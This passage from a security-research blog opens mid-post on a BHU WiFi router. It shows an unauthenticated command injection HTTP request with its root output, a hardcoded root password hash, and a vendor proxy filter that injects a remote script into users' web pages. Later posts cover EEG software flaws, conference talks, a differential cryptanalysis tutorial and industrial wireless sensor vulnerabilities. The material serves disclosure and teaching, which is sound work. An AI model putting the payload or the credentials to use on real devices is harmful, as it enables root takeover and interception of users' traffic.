Host: 192.168.62.1
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
 
<cmd>
<ITEM cmd=”traceroute” addr=”$(echo &quot;$USER&quot; &gt; /usr/share/www/res)” />

</cmd>

 The command must be HTML encoded so that the XML parsing is successful. The request above results in the following system function call:
system(“/bin/script/tracepath.sh $(echo ”$USER” > /usr/share/www/res)”)
 

When accessing:

HTTP/1.1 200 OK
Date: Thu, 01 Jan 1970 00:02:55 GMT
Last-Modified: Thu, 01 Jan 1970 00:02:52 GMT
Etag: “ac.5”
Content-Type: text/plain
Content-Length: 5
Connection: close
Accept-Ranges: bytes
 

root

 

 

The security of this router is so broken than an unauthenticated attacker can execute OS commands on the device with root privileges! It was not even necessary to find the authentication bypass in the first place, since the router uses 700000000000000 by default when no SID cookie value is provided.

At this point, we can do anything:

  • Eavesdrop the traffic on the router using tcpdump
  • Modify the configuration to redirect traffic wherever we want
  • Insert a persistent backdoor
  • Brick the device by removing critical files on the router
In addition, no default firewall rules prevent attackers from accessing the feature from the WAN if the router is connected to the Internet.

Broken and Shady

 
We’ve clearly established that the uRouter is utterly broken, but I didn’t stop there. I also wanted to look for backdoors, such as hardcoded username/password accounts or hardcoded SSH keys in the Chinese router.


For instance, on boot the BHU WiFi uRouter enables SSH by default:

 
$ nmap 192.168.62.1                     
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-07 17:03 CEST
Nmap scan report for 192.168.62.1
Host is up (0.0079s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1111/tcp open  lmsocialserver

 

It also rewrites its hardcoded root-user password every time the device boots:

 

# cat /etc/rc.d/rcS
/* [omitted] */
if [ -e /etc/rpasswd ];then
    cat /etc/rpasswd > /tmp/passwd
else
    echo bhuroot:1a94f374410c7d33de8e3d8d03945c7e:0:0:root:/root:/bin/sh > /tmp/passwd
fi
/* [omitted] */
This means that anybody who knows the bhuroot password can SSH to the router and gain root privileges. It isn’t possible for the administrator to modify or remove the hardcoded password. You’d better not expose a BHU WiFi uRouter to the Internet!

The BHU WiFi uRouter is full of surprises. In addition to default SSH and a hardcoded root password, it does something even more questionable. Have you heard of Privoxy? From the project homepage:

“Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk.”

It’s installed on the uRouter:

 

# privoxy –help
Privoxy version 3.0.21 (http://www.privoxy.org/)
# ls -l privoxy/
-rw-r–r–    1        24 bhu.action
-rw-r–r–    1       159 bhu.filter
-rw-r–r–    1      1477 config

 

The BHU WiFi uRouter is using Privoxy with a configured filter that I would not describe as “enhancing privacy” at all:

# cat privoxy/config 
confdir /tmp/privoxy
logdir /tmp/privoxy
filterfile bhu.filter
actionsfile bhu.action
logfile log
#actionsfile match-all.action # Actions that are applied to all sites and maybe overruled later on.
#actionsfile default.action   # Main actions file
#actionsfile user.action      # User customizations
listen-address  0.0.0.0:8118
toggle  1
enable-remote-toggle  1
enable-remote-http-toggle  0
enable-edit-actions 1
enforce-blocks 0
buffer-limit 4096
forwarded-connect-retries  0
accept-intercepted-requests 1
allow-cgi-request-crunching 0
split-large-forms 0
keep-alive-timeout 1
socket-timeout 300
max-client-connections 300
# cat privoxy/bhu.action 
{+filter{ad-insert}}
# cat privoxy/bhu.filter 
FILTER: ad-insert  insert ads to web                     

s@</body>@<script type=’text/javascript’ src=’http://chdadd.100msh.com/ad.js’></script></body>@g    

 

 

This configuration means that uRouter will process all HTTP requests with the filter named ad-insert. The ad-insert filter appends a script tag at the end of the body that includes a JavaScript file.

Sadly, the above URL is no longer accessible. The domain hosting the JS file does not respond to non-Chinese IP addresses, and from a Chinese IP address, it returns a 404 File Not Found error.

Nevertheless, a local copy of ad.js can be found on the router under /usr/share/ad/ad.js. Of course, the ad.js downloaded from the Internet could do anything; yet, the local version does the following:

  • Injects a DIV element at the bottom of the page of all websites the victim visits, except bhunetworks.com.
  • The DIV element embeds three links to different BHU products:
    • http://bhunetworks.com/BXB.asp  
    • http://bhunetworks.com/bms.asp
    • http://bhunetworks.com/planview.asp?id=64&classid=3/
Would you describe BHU’s use of Privoxy as “enhancing privacy…removing ads and other obnoxious Internet junk”? Me neither. While the local mirror isn’t harmful to users, I advise you to have a look at https://citizenlab.org/2015/04/chinas-great-cannon/, where Baidu injected an h.js JavaScript file into their users’ traffic in order to launch a Distributed Denial of Service against GitHub.com.


In addition, uRouter loads a very suspicious kernel module on startup:

 

# cat /etc/rc.d/rc.local
/* [omitted] */
[ -f /lib/modules/2.6.31-BHU/bhu/dns-intercept.ko ] && modprobe dns-intercept.ko

/* [omitted] */

Other kernel modules can be found in the same directory, such as url-filter.ko and pppoe-insert.ko, but I’ll leave this topic for another time.

Conclusion

The BHU WiFi uRouter I brought back from China is a specimen of great physical design. Unfortunately, on the inside it demonstrates an extremely poor level of security and questionable behaviors.

An attacker could:

  • Bypass authentication by providing a random SID cookie value
  • Access the router’s system logs and leverage their information to hijack the admin session
  • Use hardcoded hidden SID values to hijack the DMS user and gain access to the admin functions
  • Inject OS commands to be executed with root privileges without requiring authentication

In addition, the BHU WiFi uRouter injects a third-party JavaScript file into its users’ HTTP traffic. While it was not possible to access the online JavaScript file, injection of arbitrary JavaScript content could be abused to execute malicious code into the user’s browser.

Further analysis of the suspicious BHU WiFi kernel modules loaded on the uRouter at startup could reveal even more issues.


All of the high-risk findings I’ve described in this post are detailed in IOActive Security Advisories at https://ioactive.com/resources/disclosures/.
RESEARCH | February 3, 2016

Brain Waves Technologies: Security in Mind? I Don’t Think So

INTRODUCTION
Just a decade ago, electroencephalography (EEG) was limited to the inner rooms of hospitals, purely for medical purposes. Nowadays, relatively cheap consumer devices capable of measuring brain wave activity are in the hands of curious kids, researchers, artists, creators, and hackers. A few of the applications of this technology include:
·       EEG-controlled Exoskeleton Hope for ALS Sufferers
·       Brain-controlled Drone
·       Translating Soldier Thoughts to Computer Commands (Military)
·       Neurowear (Clothing)
I’ve been monitoring the news for the last year, searching keywords brain waves, and the volume of headlines is growing quickly. In other words, people out there are having fun with brain waves and are creating cool stuff using existing consumer devices and (mostly) insecure software.
 
Based on my observations using a cheap EEG device and known software, I think that many of these technologies might contain security flaws that make them vulnerable to Man-in-The-Middle (MiTM), replay, Denial-of-Service (DoS), and other attacks.

RESEARCH BACKGROUND
A few months ago, I demonstrated some of the risks associated with the acquisition, transmission, and processing of EEGs at the Bio Hacking Village at DEF CON 23 (slide deck) and BruCON. I consider this pioneering research a wakeup call for vendors and developers. I see this technology in a similar position as industrial systems. Ten years ago, only a few people were talking about SCADA/Industrial Control System (ICS) security; today it’s a whole sub-industry. Even so, programmable logical controllers are still crashing due to basic malformed packets, and other ICS critical systems are vulnerable to replay attacks due to a lack of authentication and encryption. A similar scenario is playing out with brain wave/EEG technology.
 
It’s important to mention that some technologies such as Neuromore and NeuroElectrics’ NUBE can be used to upload your EEG activity to the cloud. I do not address this in depth, other than to note that privacy is an important concern. Is your brain activity being sent to the cloud securely? Once in the cloud, is it being stored securely? Place your bets.
In the following sections, I explain some of the security concerns I observed while playing with my own brain activity using a Neurosky Mindwave device and a variety of EEG software. Because I only present a few examples here, I encourage you to take a look to my full DEF CON slide deckfor more examples.
 

I should note that real attack scenarios are a bit hard for me to achieve, since I lack specific expertise in interpreting EEG data; however, I believe I effectively demonstrate that such attacks are 100 percent feasible.

DESIGN

Through Internet research, I reviewed several technical manuals, specifications, and brochures for EEG devices and software. I searched the documents for the keywords ‘secur‘, ‘crypt‘, ‘auth‘, and ‘passw‘; 90 percent didn’t contain one such reference. It’s pretty obvious that security has not been considered at all.

NO ENCRYPTION / NO AUTHENTICATION
The major risk associated with not using encryption or authentication is that an unauthorized person could read or impersonate someone’s brain waves through replay attacks or data tampering via MiTM attacks. The resulting level of risk depends on how the EEG data is used.

Let’s consider a MiTM attack scenario where an attacker modifies data on the fly during transmission, after data acquisition but before the brain waves reach the final destination for processing. NeuroServeris an EEG signal transceiver that uses TCP/IP and EDF format. Although the NeuroServer technology is old and unmaintained, it is still in use (mostly for research) and is included in BrainBay an open-source bio and neurofeedback application.

I recorded the whole MITM attack (full screen is recommended):


For this demonstration, I changed only an ASCII string (the patient name); however, the actual EEG data can be easily manipulated in binary format.

RESILIENCE

Resilience is the ability to support or recover from adversity, in this case, DoS attacks.

Brain waves are data. Data needs to be structured and parsed, and parsers have bugs. Following is a malformed EDF header I created to remotely crash NeuroServer:


I recorded the execution of this remote DoS proof of concept code against NeuroServer:
I couldn’t believe that 1990s techniques are still killing 21st century technology. I used an infinite loop to create as many network sockets as possible and keep them open.

The following two videos show applications crashing as a result of this old technique:

       Neuroelectrics NIC TCP Server Remote DoS

       OpenViBE (software for Brain Computer Interfaces and Real Time Neurosciences) Acquisition Server Remote DoS


THE “TOWER OF BABEL” OF EEG FILE FORMATS

From its conception, EEG vendors created their own file formats. As a result, it was very difficult to share patients’ brain waves between hospitals and physicians. Years later, in 1992, the EDF format was defined and adopted by many vendors. It’s worth mentioning that EDF and its improved version EDF+ (2003), are now old. There are more recent file format specifications and implementations in EEG software; in other words, it’s a new playing field.

I spent some time inspecting brochures, manuals, and technical specifications in order to identify the most commonly used file formats. The following table shows that the most common formats are proprietary and EDF(+):
Physicians use client-side software to open files containing EEG data. The security problems associated with these applications are similar to those found in any software that has been developed insecurely. In the end, parsing EEG data is just like parsing any other file format, and parsing involves security risks.
 
I performed trivial file format fuzzing on some EDF samples containing brain waves in order to identify general software flaws, not only security flaws. Most applications crashed within a few seconds from this malformed data, and most crashes were caused by invalid memory dereferences and other conditions that may be security bugs.
 
For instance, I was able to force an abnormal termination in Persyst Advanced Review (Insight II), commercial software that opens “virtually all commercial EEG formats,” according to its website.

In the following video, I demonstrate other bugs I found in Natus Stellate Harmonie Viewer, BrainBay, and SigViewer (which uses the BioSig open-source software library):


I think that bugs in client-side applications are less relevant. The attack surface is reduced because this software is only being used by specialized people. I don’t imagine any exploit code in the future for EEG software, but attackers often launch surprising attacks, so it should still be secure.


MISC
When brain waves are communicated over the air via Bluetooth or WiFi, what about jamming? Easy to answer.
 
What about SHODAN, the search engine for the Internet of Things? I did some searches and found a few pieces of EEG equipment accessible on the Internet. The risk here is that an attacker could perform automated password cracking to gain unauthorized access through a Remote Desktop. I also noted that some equipment uses the old and unsupported Windows XP operating system. Hospitals, do you really need this equipment connected to the Internet?
STANDARDS
What about regulatory compliance? Well, some efforts have been made to treat EEG data properly. For example, the American Clinical Neurophysiology Society (ACNS) has created some guidelines.
·       (2008) Standard for Transferring Digital Neurophysiological Data Between Independent Computer Systems
·       (2006) Guideline 8: Guidelines for Recording Clinical EEG on Digital Media. Nevertheless, “magnetic storage and CD-ROMs” is mentioned here.

However, the guidelines are somewhat dated and do not consider the current technologies.
CONCLUSIONS
We need more security “in mind” for brain wave technology. Best practices, including secure design and secure programming, should be followed. I think that regulators should issue security requirements to ensure products treat brain waves in a secure manner.
 
We also need new standards and guidelines for the secure treatment of brain waves, not only from and for the health care industry, but for a wide range of industries where brain waves are used. To prevent an unauthorized person from reading or impersonating EEG data, vendors should implement authentication mechanisms before EEG data or streams are read or updated. Also, there must be authentication between the acquisition device, the EEG middleware, and the endpoints. Endpoints use decoded brain wave to perform tasks; possible EEG endpoints include a drone, prosthesis, biometric mechanism, and more.
 
The security of this technology is not keeping pace with the risks. By now, security could be improved by implementing the controls surrounding EEG technology such as SSL tunnels to encrypt brain waves in transit. Perhaps in the future we will have layer 7 bio-signal firewalls, sounds crazy right? But let’s consider that ten years ago nobody imagined an ICS / SCADA firewall / Intrusion Prevention System with Deep Packet Inspection in layer 7 to identify malformed packets while inspecting the network. The future is coming fast.
 
If you’re a developer, I encourage you to adopt more secure programming practices. If you’re a vendor, you should perform security testing on the medical devices and software you supply.
 
Finally, if you’re hooked on this topic and planning a trip to Spain, Alfonso Muñoz, a fellow Security Consultant at IOActive, will present “Cryptography with brainwaves for fun and… profit?” on March 3, 2016, at Rooted CON in Madrid.
 
Also, feel free to check out these explanatory articles, in which my research is mentioned:

·       The EEG Headband & Security
  
Happy brain waves hacking.
– Alejandro
EDITORIAL | July 29, 2015

Black Hat and DEF CON: Hacks and Fun

The great annual experience of Black Hat and DEF CON starts in just a few days, and we here at IOActive have a lot to share. This year we have several groundbreaking hacking talks and fun activities that you won’t want to miss!

For Fun
Join IOActive for an evening of dancing

Our very own DJ Alan Alvarez is back – coming all the way from Mallorca to turn the House of Blues RED. Because no one prefunks like IOActive.
Wednesday, August 5th
6–9PM
House of Blues
Escape to the IOAsis – DEF CON style!
We invite you to escape the chaos and join us in our luxury suite at Bally’s for some fun and great networking.  
Friday, August 7th12–6PM
Bally’s penthouse suite
·      Unwind with a massage 
·      Enjoy spectacular food and drinks 
·      Participate in discussions on the hottest topics in security 
·      Challenge us to a game of pool! 
FREAKFEST 2015
After a two year hiatus, we’re bringing back the party and taking it up a few notches. Join DJs Stealth Duck, Alan Alvarez, and Keith Myers as they get our booties shaking. All are welcome! This is a chance for the entire community to come together to dance, swim, laugh, relax, and generally FREAK out!
And what’s a FREAKFEST without freaks? We are welcoming the community to go beyond just dancing and get your true freak on.
Saturday, August 8th
10PM till you drop
Bally’s BLU Pool
For Hacks
Escape to the IOAsis – DEF CON style!
Join the IOActive research team for an exclusive sneak peek into the world of IOActive Labs. 
Friday, August 7th
12–6PM
Bally’s penthouse suite
 
Enjoy Lightning Talks with IOActive Researchers:
Straight from our hardware labs, our brilliant researchers will talk about their latest findings in a group of sessions we like to call IOActive Labs Presents:
·      Mike Davis & Michael Milvich: Lunch & Lab – an overview of the IOActive Hardware Lab in Seattle
Robert Erbes: Little Jenny is Export Controlled: When Knowing How to Type Turns 8th-graders into Weapons 
·      Vincent Berg: The PolarBearScan
·      Kenneth Shaw: The Grid: A Multiplayer Game of Destruction 
·      Andrew Zonenberg: The Anti Taco Device: Because Who Doesn’t Go to All This trouble? 
·      Sofiane Talmat: The Dark Side of Satellite TV Receivers 
·      Fernando Arnaboldi: Mathematical Incompetence in Programming Languages 
·      Joseph Tartaro: PS4: General State of Hacking the Console
·      Ilja Van Sprundel: An Inside Look at the NIC Minifilter
 
RSVP at https://www.eventbrite.com/e/ioactive-las-vegas-2015-tickets-17604087299
 
Black Hat/DEF CON
 
Speaker: Chris Valasek
Remote Exploitation of an Unaltered Passenger Vehicle
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 2PM Saturday, August 8, 2015
In case you haven’t heard, Dr. Charlie Miller and I will be speaking at Black Hat and DEF CON about our remote compromise of a 2014 Jeep Cherokee (http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/). While you may have seen media regarding the project, our presentation will examine the research at much more granular level. Additionally, we have a few small bits that haven’t been talked about yet, including some unseen video, along with a 90-page white paper that will provide you with an abundance of information regarding vehicle security assessments. I hope to see you all there!
Speaker: Colin Cassidy
Switches get Stitches
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 4PM Saturday, August 8, 2015
Have you ever stopped to think about the network equipment between you and your target? Yeah, we did too. In this talk we will be looking at the network switches that are used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation. In other words: DCS, PCS, ICS, and SCADA switches.
We’ll be attacking the management plane of these switches because we already know that most ICS protocols lack authentication and cryptographic integrity. By compromising the switches an attacker can perform MITM attacks on a live processes.

Not only will we reveal new vulnerabilities, along with the methods and techniques for finding them, we will also share defensive techniques and mitigations that can be applied now, to protect against the average 1-3 year patching lag (or even worse, “forever-day” issues that are never going to be patched).

 

Speaker: Damon Small
Beyond the Scan: The Value Proposition of Vulnerability Assessment
DEF CON: 2PM Thursday, August 6, 2015
It is a privilege to have been chosen to present at DEF CON 23. My presentation, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, is not about how to scan a network; rather, it is about how to consume the data you gather effectively and how to transform it into useful information that will affect meaningful change within your organization.
As I state in my opening remarks, scanning is “Some of the least sexy capabilities in information security”. So how do you turn such a base activity into something interesting? Key points I will make include:
·      Clicking “scan” is easy. Making sense of the data is hard and requires skilled professionals. The tools you choose are important, but the people using them are critical.
·      Scanning a few, specific hosts once a year is a compliance activity and useful only within the context of the standard or regulation that requires it. I advocate for longitudinal studies where large numbers of hosts are scanned regularly over time. This reveals trends that allow the information security team to not only identify missing patches and configuration issues, but also to validate processes, strengthen asset management practices, and to support both strategic and tactical initiatives.

I illustrate these concepts using several case studies. In each, the act of assessing the network revealed information to the client that was unexpected, and valuable, “beyond the scan.”

 

Speaker: Fernando Arnaboldi
Abusing XSLT for Practical Attacks
Black Hat: 3:50PM Thursday, August 6, 2015
DEF CON: 2PM Saturday, August 8, 2015
XML and XML schemas (i.e. DTD) are an interesting target for attackers. They may allow an attacker to retrieve internal files and abuse applications that rely on these technologies. Along with these technologies, there is a specific language created to manipulate XML documents that has been unnoticed by attackers so far, XSLT.

XSLT is used to manipulate and transform XML documents. Since its definition, it has been implemented in a wide range of software (standalone parsers, programming language libraries, and web browsers). In this talk I will expose some security implications of using the most widely deployed version of XSLT.

 

Speaker: Jason Larsen
Remote Physical Damage 101 – Bread and Butter Attacks

Black Hat: 9AM Thursday, August 6, 2015

 

Speaker: Jason Larsen
Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion

DEF CON:  6PM Friday, August 7, 2015

 

Speaker: Kenneth Shaw
The Grid: A Multiplayer Game of Destruction
DEF CON: 12PM Sunday, August 9, 2015, IoT Village, Bronze Room

Kenneth will host a table in the IoT Village at DEF CON where he will present a demo and explanation of vulnerabilities in the US electric grid.

 

Speaker: Sofiane Talmat
Subverting Satellite Receivers for Botnet and Profit
Black Hat: 5:30PM Wednesday, August 5, 2015
Security and the New Generation of Set Top Boxes
DEF CON: 2PM Saturday, August 8, 2015, IoT Village, Bronze Room
New satellite TV receivers are revolutionary. One of the devices used in this research is much more powerful than my graduation computer, running a Linux OS and featuring a 32-bit RISC processor @450 Mhz with 256MB RAM.

Satellite receivers are massively joining the IoT and are used to decrypt pay TV through card sharing attacks. However, they are far from being secure. In this upcoming session we will discuss their weaknesses, focusing on a specific attack that exploits both technical and design vulnerabilities, including the human factor, to build a botnet of Linux-based satellite receivers.

 

Speaker: Alejandro Hernandez
Brain Waves Surfing – (In)security in EEG (Electroencephalography) Technologies
DEF CON: 7-7:50PM Saturday, August 8, 2015, BioHacking Village, Bronze 4, Bally’s

Electroencephalography (EEG) is a non-invasive method for recording and studying electrical activity (synapse between neurons) of the brain. It can be used to diagnose or monitor health conditions such as epilepsy, sleeping disorders, seizures, and Alzheimer disease, among other clinical uses. Brain signals are also being used for many other different research and entertainment purposes, such as neurofeedback, arts, and neurogaming.

 

I wish this were a talk on how to become Johnny Mnemonic, so you could store terabytes of data in your brain, but, sorry to disappoint you, I will only cover non-invasive EEG. I will cover 101 issues that we all have known since the 90s, that affect this 21st century technology.

 

I will give a brief introduction of Brain-Computer Interfaces and EEG in order to understand the risks involved in brain signal processing, storage, and transmission. I will cover common (in)security aspects, such as encryption and authentication as well as (in)security in design. Also, I will perform some live demos, such as the visualization of live brain activity, sniffing of brain signals over TCP/IP, as well as software bugs in well-known EEG applications when dealing with corrupted brain activity files. This talk is a first step to demonstrating that many EEG technologies are vulnerable to common network and application attacks.
RESEARCH | July 24, 2015

Differential Cryptanalysis for Dummies

Recently, I ventured into the crazy world of differential cryptanalysis purely to find out what the heck it was all about. In this post, I hope to reassure you that this strange and rather cool technique is not as scary as it seems. Hopefully, you’ll be attacking some ciphers of your own in no time!

A differential cryptanalysis attack is a method of abusing pairs of plaintext and corresponding ciphertext to learn about the secret key that encrypted them, or, more precisely, to reduce the amount of time needed to find the key. It’s what is called a chosen plaintext attack; the attacker has access to plaintext and corresponding ciphertext.

We’re going to attack a simple block cipher I stole using another explanation of the technique (links are available at the bottom of the post). This cipher is meant to exhibit a few rudimentary elements of a Substitution-Permutation Network (SPN) (minus some common elements for simplicity), while highlighting the power of the differential technique. So, let’s get started.

I think a good place to start is to look at the block cipher and check out what makes it tick. Here is a quick schematic of the algorithm:

Where:

  • C  is the cipher-text
  • K_0, K_1 are the first and second round keys, respectively
  • P is the plaintext
  • SBOX is the substitution box.

As you can probably guess from looking at the schematic,: the cipher takes in two 2 sub-keys (K_0,K_1) and a piece of plain-text. It, it then XORs the plain-text with the first key, K_0, then, afterwards pulls the plain-text through a substitution box (SBOX) (we will talk about this little gadget soon). From there, it then takes the output of the SBOX, and XORs it with K_01,  and then pulls it through the SBOX again to produce the file piece of final cipher-text. So now that we know how the cipher works, and we can begin formulating our attack.!

To start off with, let’s try writing down this cipher in an algebraic form: 

C=SBOX(SBOX(P⨁K_0 )⨁K_1 )

(1)

Great! We can start talking about some of the weird properties of this cipher.

We know that when it comes to the cryptographic security of an encryption function the only thing that should be relied on for Confidentiality is your secret key (these are the words of a great Dutch cryptographer a long time ago [https://en.wikipedia.org/wiki/Auguste_Kerckhoffs]). This means the algorithm, including the workings of the SBOXs, will be known (or rather, in our analysis, we should always assume it will be known) by our attacker. Anything secret in our algorithm cannot be relied on for security. More specifically, any operation that is completely reversible (requiring only knowledge of the ciphertext) is useless!

When it comes to the use of substitution boxes, unless something we don’t know meaningfully obscures the output of the SBOX, using it will not add any security. It will be reduced to a mere reversible “encoding” of its input.

Looking at the algebraic form in (1), we can see the cipher pulls the input through the SBOX again in its last operation before returning it as ciphertext. This operation adds no security at all, especially in the context of a differential attack, because it is trivial to reverse the effect of the last SBOX. To make this clear, imagine knowing the output of the SBOX, but not being capable of knowing the input. Given the context of the last SBOX, this is impossible if you know the ciphertext. We can reduce the encryption function and focus on what actually adds security. The function becomes:

C= SBOX(P⨁K_0 )⨁K_1
(2)

Ironically, the SBOX in this expression (2), is now the only thing that adds security, so it will be the target of our analysis. Consider what would happen if we could know the output of the SBOX, including the plaintext/ciphertext pairs. The entire security of the cipher would fly out the window. After a few XOR operations, we would be able to work out the second key, and by extrapolation, the first key.

But how would we know the SBOX output? Well, what about analyzing the way the SBOX behaves by observing how differences between inputs map to differences in outputs. This insight is at the heart of differential cryptanalysis! Why choose this property? The only thing we have access to is plaintext/ciphertext pairs in a differential cryptanalysis attack (thems the rules), so we need to derive our information from this data. Also, XOR differences have favorable properties under XOR, namely they are unaffected by them. If we look at how the SBOX maps these differences, this is what we get:

∆x
∆y
count
[(x,x^’), (y,y^’)]
15
4
1
[(0, 15), (3, 7)]
15
7
1
[(3, 12), (10, 13)]
15
6
2
[(4, 11), (4, 2)] [(5, 10), (9, 15)]
5
15
1
[(3, 6), (10, 5)]
5
10
2
[(0, 5), (3, 9)] [(1, 4), (14, 4)]
3
15
1
[(1, 2), (14, 1)]
3
12
2
[(5, 6), (9, 5)] [(13, 14), (12, 0)]
3
10
2
[(8, 11), (8, 2)] [(12, 15), (13, 7)]
5
2
1
[(11, 14), (2, 0)]
5
4
1
[(8, 13), (8, 12)]
5
7
1
[(2, 7), (1, 6)]
5
6
1
[(9, 12), (11, 13)]
5
8
1
[(10, 15), (15, 7)]
4
15
1
[(10, 14), (15, 0)]
4
12
1
[(3, 7), (10, 6)]
1
7
1
[(14, 15), (0, 7)]
1
1
1
[(12, 13), (13, 12)]
Where
  • ∆x = x⊕x^’
  • ∆y = y⊕y^’
  • x^’,x is the input pair to the SBOX
  • y’,y is the output pair of from the SBOX
  • And ∆x→ ∆y is a differential characteristic
  • Count is the number of times the differential characteristic appears
 
This table is a small sample of the data collected from the SBOX.

This mapping of the XOR difference in the input to the XOR difference in the output is called a differential characteristic. Hence the name, “differential” cryptanalysis.! We can now use this data to steal the secret key.! Given the cipher-text/plain-text pairs, we need to find one encrypted under our target key that satisfies one of the differential characteristics. To find that pair you need to do the following:

Consider a sample differential characteristic a →b (this can be any differential):
  1. Choose (or generate) one plain-text P, and produce another plain-text P^’=P⨁a , where a is an input differential (notice that the XOR difference of P and P’ is a!)
  2. Encrypt the two plain-texts (P,P’) to get (C,C’)
  3. If C⨁C’ = b,  then you have a good pair!

If you know that a →b is the differential that suits your text pair, you now know what the potential input/output pairs are for the SBOX, because of thanks to the analysis we did earlier on. ! So now given these pairs, you can try different calculations for the key. You will likely have a couple possible keys, but one of them will definitely be the correct one.

For example, let’s say we have the following setup:

The keys K_0, K_1 : 0,6
 (p,p’) :=> (c,c’) : input_diff :=> output_diff : [count, [(sI,sI’),(sO,sO’)]… ]
 (3,12) -> (11, 12) : 15 :=> 7 : [1, [[(3, 12), (10, 13)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (4,11) -> (4, 2) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (3,6) -> (3, 12) : 5 :=> 15 : [1, [[(3, 6), (10, 5)]]]

The script that generated this output is available at the end of the post.

We need to select a plain-text/cipher-text pair and use the information associated to with them the pair to calculate the key.  So for example let’s use, using (3,12) => (11,12), we can then calculate the K_0, K_1 in the following way:

Given then that (from the last operation of the cipher):

C=K_1⊕ S_o

We know that (because of how XOR works):

K_1=C⊕ S_o

Although we have a couple of choices for those values, so we need to run through them.
Given that:
K_0,K_1=(11,12)
C=(11,12) this is a tuple because we are using a pair of cipher-texts
P=(3,12)
S_i=(3,12)
S_o=(10,13)
We can then try to calculate the second round key as:
K_1=C[0]⊕ S_o [0]=1   wrong!
K_1=C[0]⊕ S_o [1]=6   right!
(3)
We can also calculate K_0, namely:
K_0=P[1]⊕ S_i [0]=   wrong!
K_0=C[0]⊕ S_o [1]=   wrong!
K_0=C[0]⊕ S_o [0]=0    right!
(4)
We’ve just derived the two sub keys.! Cryptanalysis successful!
The weird behavior of the SBOX under differential mapping is what makes differential cryptanalysis possible, but it this is not to say that this is the ONLY way to perform differential cryptanalysis. The property we are using here (XOR differences) is merely one application of this concept. You should think about differential cryptanalysis as leveraging any operation in an encryption function that can be used to “explain” differences in input/output pairs. So when you’re done reading about this application, look at some of the other common operations in encryption functions and think about what else, besides SBOXs, can be abused in this way; what other properties of the input/outputs pairs have interesting behaviors under common operations?.
Also, it may be useful to think about how you can extend this application of differential cryptanalysis in order to attack multi-round ciphers (i.e. ciphers that are built using multiple rounds of computation of ciphers like the one we’ve attacked here).
Further Reading and References:
Some Scripts to play around with:

RESEARCH | July 2, 2015

Hacking Wireless Ghosts Vulnerable For Years

Is the risk associated to a Remote Code Execution vulnerability in an industrial plant the same when it affects the human life? When calculating risk, certain variables and metrics are combined into equations that are rendered as static numbers, so that risk remediation efforts can be prioritized. But such calculations sometimes ignore the environmental metrics and rely exclusively on exploitability and impact. The practice of scoring vulnerabilities without auditing the potential for collateral damage could underestimate a cyber attack that affects human safety in an industrial plant and leads to catastrophic damage or loss. These deceiving scores are always attractive for attackers since lower-priority security issues are less likely to be resolved on time with a quality remediation.

In the last few years, the world has witnessed advanced cyber attacks against industrial components using complex and expensive malware engineering. Today the lack of entry points for hacking an isolated process inside an industrial plant mean that attacks require a combination of zero-day vulnerabilities and more money.

Two years ago, Carlos Mario Penagos (@binarymantis) and I (Lucas Apa) realized that the most valuable entry point for an attacker is in the air. Radio frequencies leak out of a plant’s perimeter through the high-power antennas that interconnect field devices. Communicating with the target devices from a distance is priceless because it allows an attack to be totally untraceable and frequently unstoppable.

In August 2013 at Black Hat Briefings, we reported multiple vulnerabilities in the industrial wireless products of three vendors and presented our findings. We censored vendor names from our paper to protect the customers who use these products, primarily nuclear, oil and gas, refining, petro-chemical, utility, and wastewater companies mostly based in North America, Latin America, India, and the Middle East (Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and UAE). These companies have trusted expensive but vulnerable wireless sensors to bridge the gap between the physical and digital worlds.

First, we decided to target wireless transmitters (sensors). These sensors gather the physical, real-world values used to monitor conditions, including liquid level, pressure, flow, and temperature. These values are precise enough to be trusted by all of the industrial hardware and machinery in the field. Crucial decisions are based on these numbers. We also targeted wireless gateways, which collect this information and communicate it to the backbone SCADA systems (RTU/EFM/PLC/HMI).

In June 2013, we reported eight different vulnerabilities to the ICS-CERT (Department of Homeland Security). Three months later, one of the vendors, ProSoft Technology released a patch to mitigate a single vulnerability.

After a patient year, IOActive Labs in 2014 released an advisory titled “OleumTech Wireless Sensor Network Vulnerabilities” describing four vulnerabilities that could lead to process compromise, public damage, and employee safety, potentially leading to the loss of life.

Figure 1: OleumTech Transmitters infield

The following OleumTech Products are affected:

  • All OleumTech Wireless Gateways: WIO DH2 and Base Unit (RFv1 Protocol)
  • All OleumTech Transmitters and Wireless Modules (RFv1 Protocol)
  • BreeZ v4.3.1.166

An untrusted user or group within a 40-mile range could inject false values on the wireless gateways in order to modify measurements used to make critical decisions. In the following video demonstration, an attacker makes a chemical react and explode by targeting a wireless transmitter that monitors the process temperature. This was possible because a proper failsafe mechanism had not been implemented and physical controls failed. Heavy machinery makes crucial decisions based on the false readings; this could give the attacker control over part of the process.

Figure 2: OleumTech DH2 used as the primary Wireless Gateway to collect wireless end node data.
Video:  Attack launched using a 40 USD RF transceiver and antenna

Industrial embedded systems’ vulnerabilities that can be exploited remotely without needing any internal access are inherently appealing for terrorists.

Mounting a destructive, real-world attack in these conditions is possible. These products are in commercial use in industrial plants all over the world. As if causing unexpected chemical reactions is not enough, exploiting a remote, wireless memory corruption vulnerability could shut down the sensor network of an entire facility for an undetermined period of time.

In May 2015, two years from the initial private vulnerability disclosure, OleumTech created an updated RF protocol version (RFv2) that seems to allow users to encrypt their wireless traffic with AES256. Firmware for all products was updated to support this new feature.

Still, are OleumTech customers aware of how the new AES Encryption key is generated? Which encryption key is the network using?

